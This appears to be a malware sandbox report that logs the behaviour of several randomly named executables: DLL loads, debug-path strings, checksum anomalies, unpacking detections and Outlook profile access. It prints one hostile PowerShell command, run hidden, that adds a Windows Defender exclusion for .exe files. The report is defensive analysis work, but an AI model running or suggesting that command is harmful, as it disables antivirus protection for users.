                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: pcacli.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: mpr.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: sfc_os.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32Jump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile written: C:\Windows\System32\GroupPolicy\gpt.ini
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: file.exeStatic file information: File size 3428696 > 1048576
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: file.exeStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x14be00
                        Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x12fc00
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: appidpolicyconverter.pdbOGPS source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: XC:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xuzajoraxiy_20\kolazuto93\rimixosugixe lerofulugo\d.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444036361.000000000418C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1446288176.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1450570795.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448867855.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1449341280.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004221000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.000000000417B000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041EC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1448071216.000000000424E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1442893486.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445115527.0000000004203000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006C5B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: hh.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: hh.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F46000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\xopuxokusi 56_texag poxibivo\tajicewudok\gosicuk_84\cifafu.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484213650.0000000004B63000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483831434.00000000041CC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: appidpolicyconverter.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F16000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: GC:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: &SC:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp
                        Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000018.00000002.2188638150.0000000005240000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2083738036.00000000031E2000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdbGCTL source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.000000014026E000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: C:\kibiyasehahul-fesivodacodela\yeh75\yexesunowop\54_du.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000000.1346148421.0000000000411000.00000002.00000001.01000000.00000006.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.0000000004105000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000002.2255349183.0000000004155000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000000.1395492963.0000000000411000.00000002.00000001.01000000.0000000B.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000000.1442715755.0000000000411000.00000002.00000001.01000000.0000000E.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.0000000004385000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000000.1488476128.0000000000411000.00000002.00000001.01000000.00000010.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000000.1495901034.0000000000411000.00000002.00000001.01000000.00000012.sdmp, H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040C6000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000000.1496485772.0000000000411000.00000002.00000001.01000000.00000013.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.0000000004105000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000000.1537881887.0000000000411000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\wowakemalurac\89\zok hutaye.pdb source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1397303539.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000000.1394962827.0000000000411000.00000002.00000001.01000000.0000000A.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1453130738.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1543933265.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u69w.0.exe, 00000014.00000000.1448216913.0000000000411000.00000002.00000001.01000000.0000000F.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1718472453.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000003.1742788058.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, u4dc.0.exe, 0000001F.00000000.1530061498.0000000000411000.00000002.00000001.01000000.00000016.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000003.1828785198.0000000005DF1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: arp.pdb source: i7gUU3MlvTwbsK8r3hAjzW0p.exe, 00000009.00000003.1404026079.0000000001F39000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000006F69000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\sikozumohaf\rali\diso.pdb source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479226031.000000000421E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485938094.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041C9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1463116316.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481871080.00000000056BB000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464141295.000000000423C000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1482681071.000000000528E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1466633552.00000000041AA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004138000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479873402.00000000041AC000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483796218.0000000006285000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493616783.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1483588875.0000000006032000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1481542444.0000000005BBE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480366545.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485918092.00000000064D8000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1493614495.0000000005292000.00000004.00000020.00020000.00000000.sdmp, PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000000.1532064546.0000000000411000.00000002.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000000.1534304535.0000000000411000.00000002.00000001.01000000.00000018.sdmp
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                        Data Obfuscation

                        barindex
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeUnpacked PE file: 4.2.VtmtVe55Jwcf3rOGIU1yezyh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeUnpacked PE file: 11.2.yPlMO3UKyKRvoEYPhbGYOyT0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeUnpacked PE file: 19.2.B46afLBMY0mokUgVdA9CQR52.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeUnpacked PE file: 21.2.t7IXQJi6R3tWUMJ8f9cQzMWm.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeUnpacked PE file: 27.2.H6XhhPCeuwAb2QQK3C3B1Lwl.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeUnpacked PE file: 29.2.l0nXYBHJHVq6UHyy1YDO9fn3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeUnpacked PE file: 30.2.wr6XLbv7Ijp4TImjm1ouF4U2.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeUnpacked PE file: 34.2.6dpl9L7LbyabhVQNXZXXKjGL.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeUnpacked PE file: 39.2.ikL90ODaFTS7N6FbOffM2D1B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeUnpacked PE file: 41.2.G3pV8gTsWQBVrGpK4ooPrlxI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeUnpacked PE file: 4.2.VtmtVe55Jwcf3rOGIU1yezyh.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeUnpacked PE file: 11.2.yPlMO3UKyKRvoEYPhbGYOyT0.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeUnpacked PE file: 19.2.B46afLBMY0mokUgVdA9CQR52.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeUnpacked PE file: 21.2.t7IXQJi6R3tWUMJ8f9cQzMWm.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeUnpacked PE file: 27.2.H6XhhPCeuwAb2QQK3C3B1Lwl.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeUnpacked PE file: 29.2.l0nXYBHJHVq6UHyy1YDO9fn3.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeUnpacked PE file: 34.2.6dpl9L7LbyabhVQNXZXXKjGL.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeUnpacked PE file: 39.2.ikL90ODaFTS7N6FbOffM2D1B.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeUnpacked PE file: 41.2.G3pV8gTsWQBVrGpK4ooPrlxI.exe.400000.0.unpack
                        Suspicious powershell command line found
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                        Source: NwvsoZspGn6vizp2axhKoY0Z.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: F9a5CAWDzjn4KX6pZMk93eNG.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x670154
                        Source: wAyxI7uUktpH5TtM4zqnMftR.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: i5XdJ65IHwp8ssJDgSUt738t.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: SZ0cEDCrvP4evlvcOCUltmHu.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
                        Source: 0WEfXyMPJw5gbxAkYoQ7foIu.exe.3.drStatic PE information: real checksum: 0x7ebcf should be: 0x7ebd5
                        Source: 6iaJRQnw7XfTmk0UWiyyOxOe.exe.3.drStatic PE information: real checksum: 0x43dd4c should be: 0x4379fb
